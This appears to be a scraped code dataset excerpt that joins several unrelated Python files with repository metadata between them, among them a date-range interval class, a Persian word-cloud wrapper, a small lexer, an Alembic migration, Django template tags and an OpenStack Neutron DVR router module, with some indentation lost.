def delta(self) -> timedelta:
return self.end - self.start
def copy(self):
return type(self)(self.start, self.end)
@property
def days(self) -> int:
return self.delta().days + 1
def __init__(self,
start: Optional[date] = None,
end: Optional[date] = None):
self._intervals = []
self._add_init_range(start, end)
def _add_init_range(self, start, end):
if not start and not end:
return
if start and end:
# If the start is larger than the end we use two intervals
# from the beginning of time to end date
# from the start date to the end of time
if start > end:
if start - end <= _DAY:
# All of time
self._intervals.append(self.Interval(None, None))
return
else:
self._intervals.append(self.Interval(None, end))
self._intervals.append(self.Interval(start, None))
return
self._intervals.append(self.Interval(start, end))
@classmethod
def from_list(cls, ranges: List[Union['DateRange', 'DateRange.Interval', date]]) -> 'DateRange':
new = cls()
# TODO: use sorted for better performance
for item in ranges:
            if isinstance(item, cls.Interval):
                new_new = cls()
                new_new._intervals = [item]
                new += new_new
                continue
if isinstance(item, (DateRange, date)):
new += item
continue
raise TypeError(f'Cannot create range from type: {type(item)}')
return new
def copy(self) -> 'DateRange':
new: DateRange = type(self)(None, None)
new._intervals = [interval.copy() for interval in self]
return new
@property
def days(self) -> int:
"""Return the number of days in the DateRange (inclusive)"""
return sum(interval.days for interval in self)
@property
def intervals(self) -> List[Interval]:
"""List of date intervals within the DateRange"""
return self._intervals
@property
def earliest(self) -> date:
"""The earliest day in the DateRange"""
return self.intervals[0].start if self.intervals else None
@property
    def latest(self) -> date:
        """The latest day in the DateRange"""
return self.intervals[-1].end if self.intervals else None
@classmethod
def all_time(cls):
return cls(date.min, date.max)
def __iter__(self):
"""Iterate over the intervals"""
for interval in self.intervals:
yield interval
def __len__(self):
"""Return the number of intervals"""
return len(self.intervals)
@type_check
def __eq__(self, other: Union[date, 'DateRange']):
if len(self) != len(other):
return False
return all(interval[0] == interval[1] for interval in zip(self, other))
@type_check
def __gt__(self, other):
"""All time intervals are entirely after all of another date range's time intervals"""
return self.earliest > other.latest if self.earliest and other.latest else None
@type_check
def __lt__(self, other):
"""All time intervals are entirely before all of another date range's time intervals"""
return self.latest < other.earliest if self.latest and other.earliest else None
def __contains__(self, other: Union[date, 'DateRange']):
"""If another DateRange (or date) is entirely within this DateRange (inclusive of end date)"""
if not isinstance(other, DateRange):
if isinstance(other, date):
return any(other in _range for _range in self)
return NotImplemented
queries = iter(other.intervals)
intervals = iter(self.intervals)
total_hits = 0
interval = next(intervals, None)
query = next(queries, None)
while interval and query:
# Since queries should always be smaller or equal if true, they are advanced first
if query < interval:
query = next(queries, None)
continue
if query in interval:
total_hits += 1
query = next(queries, None)
continue
if interval < query:
interval = next(intervals, None)
continue
# This accounts for queries that overlap intervals, and queries that are larger than the interval
return False
return total_hits == len(other.intervals)
def _interval_intersect(self, other: 'DateRange') -> 'DateRange':
if not isinstance(other, DateRange):
if isinstance(other, date):
if other in self:
return type(self)(other, other)
self._intervals = []
return self
return NotImplemented
intervals = self._sorted_interval_iter(self.intervals, other.intervals)
new_intervals = []
interval = next(intervals, None)
next_interval = next(intervals, None)
while interval and next_interval:
intersection = interval & next_interval
if intersection:
new_intervals.append(intersection.copy())
if next_interval.end > interval.end:
interval = next_interval
next_interval = next(intervals, None)
self._intervals = new_intervals
return self
def __and__(self, other: Union[date, 'DateRange']) -> 'DateRange':
"""Return the intersection of date ranges or an empty DateRange if they do not intersect"""
return self.copy()._interval_intersect(other)
__rand__ = __and__
def __iand__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_intersect(other)
def _interval_union(self, other: 'DateRange') -> 'DateRange':
intervals = self._sorted_interval_iter(self.intervals, other.intervals)
new_intervals = []
interval = next(intervals, None)
next_interval = next(intervals, None)
while interval and next_interval:
if interval < next_interval and not interval.r_butted(next_interval):
new_intervals.append(interval.copy())
interval = next_interval
next_interval = next(intervals, None)
continue
if next_interval.end > interval.end:
interval.end = next_interval.end
next_interval = next(intervals, None)
self._intervals = new_intervals + [interval] if interval else []
return self
@type_check
def __or__(self, other: Union[date, 'DateRange']) -> 'DateRange':
"""Return the Union of date ranges"""
return self.copy()._interval_union(other)
__ror__ = __or__
__add__ = __or__
__radd__ = __or__
@type_check
def __ior__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_union(other)
__iadd__ = __ior__
def _interval_subtract(self, other: 'DateRange') -> 'DateRange':
# TODO: would it be easier to invert the subtrahend and intersect them?
intervals = iter(self.intervals)
subtrahends = iter(other.intervals)
new_intervals = []
temp_intervals = []
interval = next(intervals, None)
subtrahend = next(subtrahends, None)
while interval and subtrahend:
if subtrahend < interval:
subtrahend = next(subtrahends, None)
if subtrahend is None:
new_intervals.append(interval)
continue
if interval < subtrahend:
new_intervals.append(interval)
interval = next(intervals, None)
continue
# The subtrahend must be overlapping the interval at this point so we subtract
temp_intervals += interval - subtrahend
# If a portion of the interval extends past the subtrahend
if subtrahend.end < interval.end:
subtrahend = next(subtrahends, None)
if subtrahend is not None:
interval = temp_intervals.pop()
else:
interval = next(intervals, None)
new_intervals += temp_intervals
temp_intervals.clear()
self._intervals = new_intervals + temp_intervals + list(intervals)
return self
@type_check
def __sub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self.copy()._interval_subtract(other)
@type_check
def __rsub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
# ORDER IS IMPORTANT HERE
return other._interval_subtract(self)
@type_check
def __isub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_subtract(other)
def __repr__(self):
return f"DateRange[{len(self)}]({self.earliest}, {self.latest})"
def __str__(self):
return ' and\n'.join([f"from {inter.start} to {inter.end}" for inter in self])
@staticmethod
def _sorted_interval_iter(interval_list_1: List[Interval], interval_list_2: List[Interval]):
# Assumes the individual intervals are already in ascending order
intervals_1 = iter(interval_list_1)
intervals_2 = iter(interval_list_2)
interval_1 = next(intervals_1, None)
interval_2 = next(intervals_2, None)
while interval_1 or interval_2:
if interval_1 and interval_2:
if interval_1.start < interval_2.start:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
if interval_1.start > interval_2.start:
yield interval_2.copy()
interval_2 = next(intervals_2, None)
continue
if interval_1.end <= interval_2.end:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
yield interval_2.copy()
interval_2 = next(intervals_2, None)
continue
if interval_1:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
yield interval_2.copy()
interval_2 = next(intervals_2, None)
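# A short sketch of the open-ended and wrap-around construction described in the
# class docstring; it relies only on this module's own DateRange and date imports,
# and the dates chosen are arbitrary examples.
def _open_ended_range_sketch():
    summer_onwards = DateRange(date(2021, 6, 1), None)           # June 1st to end of time
    not_august = DateRange(date(2021, 9, 1), date(2021, 7, 31))  # everything except August
    assert date(2030, 1, 1) in summer_onwards
    assert date(2021, 8, 15) not in not_august
    assert date(2021, 5, 1) in not_august
    return summer_onwards, not_august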
| 38.666667
| 109
| 0.586789
|
8b7c579ff1c5c5c386752b0579ca7b9867f08206
| 6,464
|
py
|
Python
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 63
|
2018-01-13T14:45:52.000Z
|
2022-03-25T18:18:40.000Z
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 3
|
2018-03-24T23:53:04.000Z
|
2021-03-18T16:03:11.000Z
|
persian_wordcloud/wordcloud.py
|
mehotkhan/persian-word-cloud
|
d5001db7bfa33de04324831b5debde3e6548f6a5
|
[
"MIT"
] | 16
|
2018-04-03T10:16:11.000Z
|
2022-01-23T19:15:28.000Z
|
# Author: Andreas Christian Mueller <t3kcit@gmail.com>
#
# (c) 2012
# Modified by: Paul Nechifor <paul@nechifor.net>
#
# License: MIT
from __future__ import division
import re
import sys
from arabic_reshaper import arabic_reshaper
from bidi.algorithm import get_display
import warnings
from random import Random
import os
from operator import itemgetter
from wordcloud import WordCloud
from wordcloud.tokenization import unigrams_and_bigrams, process_tokens
from wordcloud.wordcloud import colormap_color_func
class PersianWordCloud(WordCloud):
def __init__(self, font_path=None, only_persian=False, width=400, height=200, margin=2,
ranks_only=None, prefer_horizontal=.9, mask=None, scale=1,
color_func=None, max_words=200, min_font_size=4,
stopwords=None, random_state=None, background_color='black',
max_font_size=None, font_step=1, mode="RGB",
relative_scaling=.5, regexp=None, collocations=True,
colormap=None, normalize_plurals=True):
super(PersianWordCloud, self).__init__(font_path, width, height, margin,
ranks_only, prefer_horizontal, mask, scale,
color_func, max_words, min_font_size,
stopwords, random_state, background_color,
max_font_size, font_step, mode,
relative_scaling, regexp, collocations,
colormap, normalize_plurals)
if font_path is None:
font_path = FONT_PATH
if color_func is None and colormap is None:
# we need a color map
import matplotlib
version = matplotlib.__version__
if version[0] < "2" and version[2] < "5":
colormap = "hsv"
else:
colormap = "viridis"
self.only_persian = only_persian
self.colormap = colormap
self.collocations = collocations
self.font_path = font_path
self.width = width
self.height = height
self.margin = margin
self.prefer_horizontal = prefer_horizontal
self.mask = mask
self.scale = scale
self.color_func = color_func or colormap_color_func(colormap)
self.max_words = max_words
self.stopwords = stopwords if stopwords is not None else STOPWORDS
self.min_font_size = min_font_size
self.font_step = font_step
self.regexp = regexp
if isinstance(random_state, int):
random_state = Random(random_state)
self.random_state = random_state
self.background_color = background_color
self.max_font_size = max_font_size
self.mode = mode
if relative_scaling < 0 or relative_scaling > 1:
raise ValueError("relative_scaling needs to be "
"between 0 and 1, got %f." % relative_scaling)
self.relative_scaling = relative_scaling
if ranks_only is not None:
warnings.warn("ranks_only is deprecated and will be removed as"
" it had no effect. Look into relative_scaling.",
DeprecationWarning)
self.normalize_plurals = normalize_plurals
def process_text(self, text):
"""Splits a long text into words, eliminates the stopwords.
Parameters
----------
text : string
The text to be processed.
Returns
-------
words : dict (string, int)
Word tokens with associated frequency.
..versionchanged:: 1.2.2
Changed return type from list of tuples to dict.
Notes
-----
There are better ways to do word tokenization, but I don't want to
include all those things.
"""
stopwords = set([i.lower() for i in self.stopwords])
flags = (re.UNICODE if sys.version < '3' and type(text) is unicode
else 0)
regexp = self.regexp if self.regexp is not None else r"\w[\w']+"
words = re.findall(regexp, text, flags)
# remove stopwords
words = [word for word in words if word.lower() not in stopwords]
# remove 's
words = [word[:-2] if word.lower().endswith("'s") else word
for word in words]
# remove numbers
words = [word for word in words if not word.isdigit()]
# remove arabic characters
if self.only_persian:
words = [self.remove_ar(word) for word in words]
if self.collocations:
word_counts = unigrams_and_bigrams(words, self.normalize_plurals)
else:
word_counts, _ = process_tokens(words, self.normalize_plurals)
return word_counts
def generate(self, text):
"""Generate wordcloud from text.
The input "text" is expected to be a natural text. If you pass a sorted
list of words, words will appear in your output twice. To remove this
duplication, set ``collocations=False``.
Alias to generate_from_text.
Calls process_text and generate_from_frequencies.
Returns
-------
self
"""
# reshape persian words
text = get_display(arabic_reshaper.reshape(text))
return self.generate_from_text(text)
@staticmethod
def remove_ar(text):
dic = {
'ك': 'ک',
'دِ': 'د',
'بِ': 'ب',
'زِ': 'ز',
'ذِ': 'ذ',
'شِ': 'ش',
'سِ': 'س',
'ى': 'ی',
'ي': 'ی'
}
pattern = "|".join(map(re.escape, dic.keys()))
return re.sub(pattern, lambda m: dic[m.group()], text)
item1 = itemgetter(1)
FONT_PATH = os.environ.get("FONT_PATH", os.path.join(os.path.dirname(__file__),
"fonts/Vazir-Light.ttf"))
stop_words_reshape = get_display(arabic_reshaper.reshape(open(
(os.path.join(os.path.dirname(__file__), 'stopwords')), encoding='utf-8').read()))
STOPWORDS = set([x.strip() for x in stop_words_reshape.split('\n')])
def add_stop_words(words):
for word in words:
words_reshape = get_display(arabic_reshaper.reshape(word))
STOPWORDS.add(words_reshape)
return STOPWORDS
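# A minimal usage sketch (file name, stopwords and parameters are illustrative):
# extend the stopword set, generate a cloud from raw Persian text, then save it via
# to_file(), which is assumed to be inherited unchanged from wordcloud.WordCloud.
def _persian_wordcloud_sketch(text, output_path='cloud.png'):
    add_stop_words(['اگر', 'اما'])
    cloud = PersianWordCloud(only_persian=True, max_words=100,
                             width=800, height=400, background_color='white')
    cloud.generate(text)        # reshapes and reorders the text, then lays out the words
    cloud.to_file(output_path)
    return cloud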
| 36.314607
| 91
| 0.587407
|
6e6c5e3ea9426525e986b3a1c3dc8388e9156331
| 812
|
py
|
Python
|
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
crayonLexer.py
|
bmilts/Crayon-Toy-language
|
9445e4c2a3623b328f398837808b9005ec0e8af5
|
[
"FTL",
"CNRI-Python"
] | null | null | null |
import sys
import re
# Takes chars and expression functions and compares them to python regular expressions
def lex(chars, expressionToks):
pos = 0
tokens = []
while pos < len(chars):
match = None
for expressionTok in expressionToks:
pattern, marker = expressionTok
regex = re.compile(pattern)
match = regex.match(chars, pos)
if match:
text = match.group(0)
if marker:
token = (text, marker)
tokens.append(token)
break
# Error checking
if not match:
            sys.stderr.write('Unaccepted crayon char: %s\n' % chars[pos])
sys.exit(1)
else:
pos = match.end(0)
return tokens
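# A minimal usage sketch: token specifications are (regex, marker) pairs tried in
# order, and a None marker silently discards the match (e.g. whitespace). The token
# names below are made up for illustration.
def _lex_sketch():
    token_exprs = [
        (r'[ \n\t]+', None),                 # skip whitespace
        (r'[0-9]+', 'INT'),
        (r'[A-Za-z][A-Za-z0-9_]*', 'ID'),
        (r'\+', 'PLUS'),
    ]
    return lex('x + 42', token_exprs)        # -> [('x', 'ID'), ('+', 'PLUS'), ('42', 'INT')]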
| 28
| 86
| 0.519704
|
a14aa1f495ca11704f87c87ac68502f66c9e2de1
| 454
|
py
|
Python
|
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
module_build_service/migrations/versions/edb537dd1e8c_.py
|
zhongtianxie/fm-orchestrator
|
5ab39bf1981cf4abdf7ca4c2a7d4a6120f1bea2f
|
[
"MIT"
] | null | null | null |
"""Add cg_build_koji_tag
Revision ID: edb537dd1e8c
Revises: c11a3cfec2a9
Create Date: 2017-09-22 13:50:41.433144
"""
# revision identifiers, used by Alembic.
revision = 'edb537dd1e8c'
down_revision = 'c11a3cfec2a9'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('module_builds', sa.Column('cg_build_koji_tag', sa.String(), nullable=True))
def downgrade():
op.drop_column('module_builds', 'cg_build_koji_tag')
| 19.73913
| 94
| 0.753304
|
8ca9c6b69bde877de08aae558319a926b1f309d7
| 63
|
py
|
Python
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | 1
|
2019-08-11T18:25:18.000Z
|
2019-08-11T18:25:18.000Z
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | 33
|
2020-05-12T01:21:05.000Z
|
2021-12-07T16:13:42.000Z
|
hypertools/external/__init__.py
|
jeremymanning/hypertools
|
1b39b41aaa634e816d73635e0b9b773f1ed6e709
|
[
"MIT"
] | null | null | null |
from .brainiak import SRM, DetSRM, RSRM
from .ppca import PPCA
| 21
| 39
| 0.777778
|
4710cd3784507486f0c6819572483941f49a0173
| 2,392
|
py
|
Python
|
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | 1
|
2022-01-11T07:21:17.000Z
|
2022-01-11T07:21:17.000Z
|
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | null | null | null |
cmsplugin_cascade/templatetags/cascade_tags.py
|
gitter-badger/djangocms-cascade
|
ac293b11d5bc1f8cb73a7c2e7697eaaa6c937e1f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django import template
from django.core.cache import caches
from django.template.exceptions import TemplateSyntaxError
from django.contrib.staticfiles import finders
from classytags.arguments import Argument
from classytags.core import Options, Tag
register = template.Library()
class StrideRenderer(Tag):
"""
Render the serialized content of a placeholder field using the full cascade of plugins.
{% render_cascade "cascade-data.json" %}
Keyword arguments:
datafile -- Filename containing the cascade tree. Must be file locatable by Django's
static file finders.
"""
name = 'render_cascade'
options = Options(
Argument('datafile'),
)
def render_tag(self, context, datafile):
from sekizai.helpers import get_varname
from cmsplugin_cascade.strides import StrideContentRenderer
jsonfile = finders.find(datafile)
if not jsonfile:
raise IOError("Unable to find file: {}".format(datafile))
with open(jsonfile) as fp:
tree_data = json.load(fp)
content_renderer = StrideContentRenderer(context['request'])
with context.push(cms_content_renderer=content_renderer):
content = content_renderer.render_cascade(context, tree_data)
# some templates use Sekizai's templatetag `addtoblock` or `add_data`, which have to be re-added to the context
cache = caches['default']
if cache:
varname = get_varname()
SEKIZAI_CONTENT_HOLDER = cache.get_or_set(varname, context.get(varname))
if SEKIZAI_CONTENT_HOLDER:
for name in SEKIZAI_CONTENT_HOLDER:
context[varname][name] = SEKIZAI_CONTENT_HOLDER[name]
return content
register.tag('render_cascade', StrideRenderer)
class RenderPlugin(Tag):
name = 'render_plugin'
options = Options(
Argument('plugin')
)
def render_tag(self, context, plugin):
if not plugin:
return ''
content_renderer = context['cms_content_renderer']
content = content_renderer.render_plugin(
instance=plugin,
context=context,
editable=content_renderer.user_is_on_edit_mode(),
)
return content
register.tag('render_plugin', RenderPlugin)
| 30.666667
| 119
| 0.67893
|
271824b3d1aa819d47caf8cdf26f4def587455ed
| 365
|
py
|
Python
|
opendc/api/v1/specifications/memories/endpoint.py
|
kl1de/kl1de
|
5dc37467b48b4f7dc74292b79fc93a41a93112d0
|
[
"MIT"
] | 2
|
2017-01-24T12:28:51.000Z
|
2017-01-25T15:12:26.000Z
|
opendc/api/v1/specifications/memories/endpoint.py
|
kl1de/kl1de
|
5dc37467b48b4f7dc74292b79fc93a41a93112d0
|
[
"MIT"
] | 7
|
2017-03-15T08:47:21.000Z
|
2018-11-28T10:36:41.000Z
|
opendc/api/v1/specifications/memories/endpoint.py
|
atlarge-research/opendc-web-server
|
71aa937a9b7db7289d69ac85587387070d2af851
|
[
"MIT"
] | 1
|
2017-01-25T15:12:44.000Z
|
2017-01-25T15:12:44.000Z
|
from opendc.models.memory import Memory
from opendc.util.rest import Response
def GET(request):
"""Get a list of the specifications of all Memories."""
# Get the Memories
memories = Memory.query()
# Return the Memories
return Response(
200,
'Successfully retrieved Memories.',
[x.to_JSON() for x in memories]
)
| 19.210526
| 59
| 0.649315
|
ac0b53c300da1ffd46810da150d122f23a5a6e98
| 10,359
|
py
|
Python
|
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
neutron/agent/l3/dvr_edge_router.py
|
freyes/neutron
|
197c222acb0390728106a083d1663f2c06427518
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import constants as l3_constants
from oslo_log import log as logging
from neutron._i18n import _LE
from neutron.agent.l3 import dvr_local_router
from neutron.agent.l3 import dvr_snat_ns
from neutron.agent.l3 import router_info as router
from neutron.agent.linux import ip_lib
from neutron.agent.linux import iptables_manager
LOG = logging.getLogger(__name__)
class DvrEdgeRouter(dvr_local_router.DvrLocalRouter):
def __init__(self, agent, host, *args, **kwargs):
super(DvrEdgeRouter, self).__init__(agent, host, *args, **kwargs)
self.snat_namespace = None
self.snat_iptables_manager = None
def external_gateway_added(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_added(
ex_gw_port, interface_name)
if self._is_this_snat_host():
self._create_dvr_gateway(ex_gw_port, interface_name)
# NOTE: When a router is created without a gateway the routes get
# added to the router namespace, but if we wanted to populate
# the same routes to the snat namespace after the gateway port
# is added, we need to call routes_updated here.
self.routes_updated([], self.router['routes'])
def external_gateway_updated(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
if self.snat_namespace:
LOG.debug("SNAT was rescheduled to host %s. Clearing snat "
"namespace.", self.router.get('gw_port_host'))
return self.external_gateway_removed(
ex_gw_port, interface_name)
return
if not self.snat_namespace:
# SNAT might be rescheduled to this agent; need to process like
# newly created gateway
return self.external_gateway_added(ex_gw_port, interface_name)
else:
self._external_gateway_added(ex_gw_port,
interface_name,
self.snat_namespace.name,
preserve_ips=[])
def _external_gateway_removed(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_removed(ex_gw_port,
interface_name)
if not self._is_this_snat_host() and not self.snat_namespace:
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self.driver.unplug(interface_name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.snat_namespace.name,
prefix=router.EXTERNAL_DEV_PREFIX)
def external_gateway_removed(self, ex_gw_port, interface_name):
self._external_gateway_removed(ex_gw_port, interface_name)
if self.snat_namespace:
self.snat_namespace.delete()
self.snat_namespace = None
def internal_network_added(self, port):
super(DvrEdgeRouter, self).internal_network_added(port)
        # TODO(gsagie) some of these checks are already implemented
        # in the base class, think how to avoid re-doing them
if not self._is_this_snat_host():
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(self.router['id'])
interface_name = self._get_snat_int_device_name(sn_port['id'])
self._internal_network_added(
ns_name,
sn_port['network_id'],
sn_port['id'],
sn_port['fixed_ips'],
sn_port['mac_address'],
interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX,
mtu=sn_port.get('mtu'))
def _dvr_internal_network_removed(self, port):
super(DvrEdgeRouter, self)._dvr_internal_network_removed(port)
if not self.ex_gw_port:
return
sn_port = self.get_snat_port_for_internal_port(port, self.snat_ports)
if not sn_port:
return
if not self._is_this_snat_host():
return
snat_interface = self._get_snat_int_device_name(sn_port['id'])
ns_name = self.snat_namespace.name
prefix = dvr_snat_ns.SNAT_INT_DEV_PREFIX
if ip_lib.device_exists(snat_interface, namespace=ns_name):
self.driver.unplug(snat_interface, namespace=ns_name,
prefix=prefix)
def _plug_snat_port(self, port):
interface_name = self._get_snat_int_device_name(port['id'])
self._internal_network_added(
self.snat_namespace.name, port['network_id'],
port['id'], port['fixed_ips'],
port['mac_address'], interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX,
mtu=port.get('mtu'))
def _create_dvr_gateway(self, ex_gw_port, gw_interface_name):
"""Create SNAT namespace."""
snat_ns = self._create_snat_namespace()
# connect snat_ports to br_int from SNAT namespace
for port in self.get_snat_interfaces():
# create interface_name
self._plug_snat_port(port)
self._external_gateway_added(ex_gw_port, gw_interface_name,
snat_ns.name, preserve_ips=[])
self.snat_iptables_manager = iptables_manager.IptablesManager(
namespace=snat_ns.name,
use_ipv6=self.use_ipv6)
def _create_snat_namespace(self):
# TODO(mlavalle): in the near future, this method should contain the
# code in the L3 agent that creates a gateway for a dvr. The first step
# is to move the creation of the snat namespace here
self.snat_namespace = dvr_snat_ns.SnatNamespace(self.router['id'],
self.agent_conf,
self.driver,
self.use_ipv6)
self.snat_namespace.create()
return self.snat_namespace
def _get_snat_int_device_name(self, port_id):
long_name = dvr_snat_ns.SNAT_INT_DEV_PREFIX + port_id
return long_name[:self.driver.DEV_NAME_LEN]
def _is_this_snat_host(self):
host = self.router.get('gw_port_host')
if not host:
LOG.debug("gw_port_host missing from router: %s",
self.router['id'])
return host == self.host
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self)._handle_router_snat_rules(
ex_gw_port, interface_name)
if not self._is_this_snat_host():
return
if not self.get_ex_gw_port():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
with self.snat_iptables_manager.defer_apply():
self._empty_snat_chains(self.snat_iptables_manager)
# NOTE: DVR adds the jump to float snat via super class,
# but that is in the router namespace and not snat.
self._add_snat_rules(ex_gw_port, self.snat_iptables_manager,
interface_name)
def update_routing_table(self, operation, route):
if self.get_ex_gw_port() and self._is_this_snat_host():
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(
self.router['id'])
# NOTE: For now let us apply the static routes both in SNAT
# namespace and Router Namespace, to reduce the complexity.
ip_wrapper = ip_lib.IPWrapper(namespace=ns_name)
if ip_wrapper.netns.exists(ns_name):
super(DvrEdgeRouter, self)._update_routing_table(
operation, route, namespace=ns_name)
else:
LOG.error(_LE("The SNAT namespace %s does not exist for "
"the router."), ns_name)
super(DvrEdgeRouter, self).update_routing_table(operation, route)
def delete(self, agent):
super(DvrEdgeRouter, self).delete(agent)
if self.snat_namespace:
self.snat_namespace.delete()
def process_address_scope(self):
super(DvrEdgeRouter, self).process_address_scope()
if not self._is_this_snat_host():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
# Prepare address scope iptables rule for dvr snat interfaces
internal_ports = self.get_snat_interfaces()
ports_scopemark = self._get_port_devicename_scopemark(
internal_ports, self._get_snat_int_device_name)
# Prepare address scope iptables rule for external port
external_port = self.get_ex_gw_port()
if external_port:
external_port_scopemark = self._get_port_devicename_scopemark(
[external_port], self.get_external_device_name)
for ip_version in (l3_constants.IP_VERSION_4,
l3_constants.IP_VERSION_6):
ports_scopemark[ip_version].update(
external_port_scopemark[ip_version])
with self.snat_iptables_manager.defer_apply():
self._add_address_scope_mark(
self.snat_iptables_manager, ports_scopemark)
| 42.805785
| 79
| 0.633555
|
1c34696f1cfdec0956bb16ca716e88db0d45eff0
| 45
|
py
|
Python
|
agescx/utilities/__init__.py
|
dderevjanik/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 15
|
2016-02-08T19:35:46.000Z
|
2021-11-24T06:52:04.000Z
|
agescx/utilities/__init__.py
|
heinezen/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 1
|
2016-01-03T02:54:46.000Z
|
2016-01-03T02:54:46.000Z
|
agescx/utilities/__init__.py
|
heinezen/agescx
|
32e1b11c7c4205a63a156b0014ec7143c0d0c13b
|
[
"MIT"
] | 5
|
2016-10-05T03:55:29.000Z
|
2021-05-14T10:15:57.000Z
|
from .decoder import *
from .encoder import *
| 22.5
| 22
| 0.755556
|
5f8ef0d30ea7eb454525b9370023c18314ca6299
| 424
|
py
|
Python
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 18
|
2015-04-25T05:31:05.000Z
|
2020-02-28T20:58:42.000Z
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 47
|
2015-01-03T00:20:29.000Z
|
2021-12-01T11:16:48.000Z
|
mine/models/_bases.py
|
jacebrowning/mine
|
33b21f075f2f65678ce050dc74285a0b6f55ab0c
|
[
"MIT"
] | 1
|
2016-01-02T04:05:27.000Z
|
2016-01-02T04:05:27.000Z
|
"""Shared base classes and mixins."""
class NameMixin:
"""Mixin class for objects identified by their name."""
def __str__(self):
return str(self.name) # type: ignore
def __eq__(self, other):
return str(self).lower() == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return str(self).lower() < str(other).lower()
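# A minimal usage sketch (the Item class below is hypothetical, not part of
# this module); comparisons go through str() and are case-insensitive:
#
#     class Item(NameMixin):
#         def __init__(self, name):
#             self.name = name
#
#     Item("Foo") == Item("foo")      # True
#     Item("apple") < Item("Banana")  # True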
| 23.555556
| 59
| 0.617925
|
499eb942c0be3e944026fc5611c0c991a8756701
| 1,122
|
py
|
Python
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 778
|
2017-01-27T16:29:17.000Z
|
2022-03-30T03:01:51.000Z
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 6,634
|
2017-01-15T22:56:13.000Z
|
2022-03-31T15:03:36.000Z
|
applications/ShallowWaterApplication/python_scripts/semi_lagrangian_shallow_water_solver.py
|
philbucher/Kratos
|
1ceb900dbacfab344e27e32285250eafc52093ec
|
[
"BSD-4-Clause"
] | 224
|
